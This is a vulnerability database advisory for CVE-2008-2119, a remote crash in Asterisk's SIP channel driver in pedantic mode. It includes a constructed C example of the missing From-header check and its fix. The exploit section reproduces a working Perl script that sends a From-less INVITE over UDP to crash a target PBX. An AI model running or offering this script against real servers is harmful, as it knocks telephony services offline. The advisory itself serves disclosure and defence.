Asterisk SIP Channel Driver Remote Denial of Service Vulnerability

Vulnerability ID 1115359 Vulnerability type Input validation
Published 2008-06-05 Updated 2008-06-05
CVE number CVE-2008-2119 CNNVD-ID CNNVD-200806-074
Vulnerability platform Multiple CVSS score 4.3
|Vulnerability sources
https://www.exploit-db.com/exploits/5749
https://www.securityfocus.com/bid/29516
https://cxsecurity.com/issue/WLB-2008060019
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200806-074
|Vulnerability details
Asterisk is an open-source software PBX that supports a variety of VoIP protocols and devices. When Asterisk processes SIP in pedantic mode, it passes the value of the From header to the ast_uri_decode function for decoding. Because the From value is not checked for being empty before it is decoded, this can crash the routine, resulting in a remote denial of service.
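The defect class the description names, a header lookup result handed to a URI decoder without first checking that the header is present, is illustrated below with an added example in C. This is not Asterisk source and does not reproduce Asterisk's fix: the header lookup, the %XX decoder, the handle_from_pedantic guard and the two SIP messages are all constructed for the example. It shows the decoder crashing on a NULL argument by construction and the caller-side check that rejects a request without a From header instead of dereferencing it.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>

#define MAX_HDR 256

/* Constructed sample messages (not captured traffic). The second one omits
 * the From header, which is the condition the advisory describes. */
static const char GOOD_INVITE[] =
    "INVITE sip:1234@pbx.example SIP/2.0\r\n"
    "From: <sip:%41lice@example.net>;tag=1\r\n"
    "CSeq: 2 INVITE\r\n"
    "\r\n";

static const char NO_FROM_INVITE[] =
    "INVITE sip:1234@pbx.example SIP/2.0\r\n"
    "CSeq: 2 INVITE\r\n"
    "\r\n";

/* Hypothetical header lookup: copies the trimmed value of "name" into out and
 * returns out, or returns NULL when the header is absent. The NULL return is
 * what an unchecked caller would hand straight to the decoder. */
static const char *sip_get_header(const char *msg, const char *name,
                                  char *out, size_t outlen)
{
    size_t nlen = strlen(name);
    const char *line = msg;

    while (line && *line) {
        if (strncasecmp(line, name, nlen) == 0 && line[nlen] == ':') {
            const char *v = line + nlen + 1;
            while (*v == ' ' || *v == '\t')
                v++;
            const char *end = strpbrk(v, "\r\n");
            size_t len = end ? (size_t)(end - v) : strlen(v);
            if (len >= outlen)
                len = outlen - 1;
            memcpy(out, v, len);
            out[len] = '\0';
            return out;
        }
        line = strchr(line, '\n');   /* advance to the next header line */
        if (line)
            line++;
    }
    return NULL;
}

/* Hypothetical in-place %XX decoder standing in for a URI decoder. It
 * dereferences s unconditionally, so a NULL argument is a crash: the
 * caller, not the decoder, has to establish that the header exists. */
static void uri_decode(char *s)
{
    char *out = s;

    for (; *s; s++) {
        if (s[0] == '%' && isxdigit((unsigned char)s[1]) &&
            isxdigit((unsigned char)s[2])) {
            char hex[3] = { s[1], s[2], '\0' };
            *out++ = (char)strtol(hex, NULL, 16);
            s += 2;
        } else {
            *out++ = *s;
        }
    }
    *out = '\0';
}

/* Hardened pedantic-mode handling: the From value is looked up and checked
 * for absence or emptiness before it is decoded. Returns 1 with the decoded
 * value in from, or 0 when the request should be rejected instead. */
static int handle_from_pedantic(const char *msg, char *from, size_t fromlen)
{
    if (sip_get_header(msg, "From", from, fromlen) == NULL || from[0] == '\0')
        return 0;                    /* reject malformed request, no dereference */
    uri_decode(from);
    return 1;
}

int main(void)
{
    char from[MAX_HDR];

    if (handle_from_pedantic(GOOD_INVITE, from, sizeof from))
        printf("From decoded: %s\n", from);
    if (!handle_from_pedantic(NO_FROM_INVITE, from, sizeof from))
        printf("Request without From header rejected, not decoded\n");
    return 0;
}
```

The point of the guard is where it sits: the presence check belongs in the caller that obtains the header, before any routine that assumes a non-NULL, non-empty string is invoked. A decoder that is handed NULL cannot recover the error on its own.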
|Exploit (EXP)
#!/usr/bin/perl -w
###############


# asterisk AST-2008-008
# by armando.j.m.o@gmail.com
#AST-2008-008 - Remote Crash Vulnerability in SIP channel driver when run in pedantic mode

use Getopt::Std;
use IO::Socket;
use strict;

my %args;
getopts("h:p:", \%args);

if (!$args{h} || !$args{p}) { usage(); }


my $sock = IO::Socket::INET->new(
    Proto    => 'udp',
    PeerPort => $args{p},
    PeerAddr => $args{h},
) or die "Could not create socket: $!\n";

$sock->send('INVITE sip:1234@'.$args{h}.' SIP/2.0\n
CSeq: 2 INVITE') or die "Send error: $!\n";




sub usage {
    print STDERR
qq{ $0

Usage: $0 -h <host> -p <port>
        -h <host>       = host
        -p <port>       = port

Example:
        $0 -h target -p port


};
    exit 1;
}

# milw0rm.com [2008-06-05]
|Affected products
Gentoo Linux
Asterisk Asterisk Business Edition B.2.5.2
Asterisk Asterisk Business Edition B.2.5.1
Asterisk Asterisk Business Edition B.2.3.6
Asterisk Asterisk Business Edition B.2.3.4
|References

Source: SECTRACK
Name: 1020166
Link: http://www.securitytracker.com/id?1020166
Source: BUGTRAQ
Name: 20080603 AST-2008-008: Remote Crash Vulnerability in SIP channel driver when run in pedantic mode
Link: http://www.securityfocus.com/archive/1/archive/1/493020/100/0/threaded
Source: svn.digium.com
Link: http://svn.digium.com/view/asterisk?view=rev&revision=120109
Source: GENTOO
Name: GLSA-200905-01
Link: http://security.gentoo.org/glsa/glsa-200905-01.xml
Source: SECUNIA
Name: 34982
Link: http://secunia.com/advisories/34982
Source: downloads.digium.com
Link: http://downloads.digium.com/pub/security/AST-2008-008.html
Source: bugs.digium.com
Link: http://bugs.digium.com/view.php?id=12607
Source: XF
Name: asterisk-asturidecode-dos(42823)
Link: http://xforce.iss.net/xforce/xfdb/42823
Source: MILW0RM
Name: 5749
Link: http://www.milw0rm.com/exploits/5749
Source: VUPEN
Name: ADV-2008-1731
Link: http://www.frsirt.com/english/advisories/2008/1731
Source: SECUNIA
Name: 30517
Link: http://secunia.com/advisories/30517